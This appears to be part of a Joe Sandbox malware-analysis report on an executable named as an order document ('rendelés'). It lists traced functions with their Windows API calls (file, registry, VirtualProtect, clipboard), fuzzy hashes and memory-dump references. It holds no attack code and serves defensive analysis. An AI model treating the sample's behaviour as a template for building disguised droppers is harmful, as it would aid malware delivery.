API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79

Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe,80000000,00000003), ref: 0040615C
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040614C

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98

Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
GetLastError.KERNEL32 ref: 00405C2A

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D

Function 6FC62B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 6FC62C57

Memory Dump Source

Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9b3b552760ebe38cf33c3c864a5e3fe4f4004ee0fde3bd6f74fcbf06f66f621c
Instruction ID: 311a3ce8bc288d8c4504069c6176e8b415501109f190396c7ccfa47d042dcb61
Opcode Fuzzy Hash: 9b3b552760ebe38cf33c3c864a5e3fe4f4004ee0fde3bd6f74fcbf06f66f621c
Instruction Fuzzy Hash: 1941BF7150C705EFDF149F69D9E4BE977B4EB49328F308826E601CA141E738E499CBA1

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Function 00406503 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 2c089d9499bcaed07f509e48e4c3e1e82a1ca6aec248580a4a456b36f8037f69
Instruction ID: 6450ab0b933f3cc6d02a21ebc76c27f69b4627690f11a38bac6dda038a0a621d
Opcode Fuzzy Hash: 2c089d9499bcaed07f509e48e4c3e1e82a1ca6aec248580a4a456b36f8037f69
Instruction Fuzzy Hash: 87E08072304105EBE740DB64DE49FAE7368DF40358F204637E511E51D1E6B49945972D

Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0041307B,0040CEF0,00403579,0040CEF0,0041307B,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5

Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8

Function 6FC62A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6FC6505C,00000004,00000040,6FC6504C), ref: 6FC62A9D

Memory Dump Source

Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 20b627275ea14a1613930eb47eea94cd28f52adf5073e67c49a24e21f02c2214
Instruction ID: 87faeb75d070964b9320bb48ea005e0d984c1c7c8e8a47399a39d0b428962a9b
Opcode Fuzzy Hash: 20b627275ea14a1613930eb47eea94cd28f52adf5073e67c49a24e21f02c2214
Instruction Fuzzy Hash: 3AF0ACB050CA82DECB50CF2E85447253BF0BB06324B344D2AE348D6247E374C064CB91

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
Opcode Fuzzy Hash: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E

Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Function 004045F9 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19

Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000000), ref: 004014EA

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
Instruction ID: bbd52a04332822db077aadb4670005be58b9dadf0e212328a8e92bdd2ddecc01
Opcode Fuzzy Hash: 15a9c0a1a05cffc918dcbcc278dd47063fd183ee82f4bdf0f9578bef0d0e5dce
Instruction Fuzzy Hash: 1BD05E73A141018BD714EBB8BE8545E73A8EB503193208837D442E1191E6788896861C

Function 6FC612BB Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,6FC612DB,?,6FC6137F,00000019,6FC611CA,-000000A0), ref: 6FC612C5

Memory Dump Source

Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: eb398bdcad02f07d6be623f84e738c9e22fabe5368a75a9954f3c40a63e613b1
Instruction ID: 5825e3c9c1547f256877127677f68d07b18efe5eb7c88faa367199281924b3a5
Opcode Fuzzy Hash: eb398bdcad02f07d6be623f84e738c9e22fabe5368a75a9954f3c40a63e613b1
Instruction Fuzzy Hash: 39B01270A0C401DFEE008B69CC06F353274F701311F044000F700C01C1C120C8208534

Non-executed Functions

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405867
GetDlgItem.USER32(?,000003EE), ref: 00405876
GetClientRect.USER32(?,?), ref: 004058B3
GetSystemMetrics.USER32(00000002), ref: 004058BA
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
ShowWindow.USER32(?,00000008), ref: 00405956
GetDlgItem.USER32(?,000003EC), ref: 00405977
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
GetDlgItem.USER32(?,000003F8), ref: 00405885

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

GetDlgItem.USER32(?,000003EC), ref: 004059C9
CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
CloseHandle.KERNEL32(00000000), ref: 004059DE
ShowWindow.USER32(00000000), ref: 00405A02
ShowWindow.USER32(?,00000008), ref: 00405A07
ShowWindow.USER32(00000008), ref: 00405A51
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
CreatePopupMenu.USER32 ref: 00405A96
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
GetWindowRect.USER32(?,?), ref: 00405ACA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
OpenClipboard.USER32(00000000), ref: 00405B2B
EmptyClipboard.USER32 ref: 00405B31
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
GlobalLock.KERNEL32(00000000), ref: 00405B47
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
CloseClipboard.USER32 ref: 00405B8C

Strings

H7B, xrefs: 00405AF7
{, xrefs: 00405A6F

Memory Dump Source

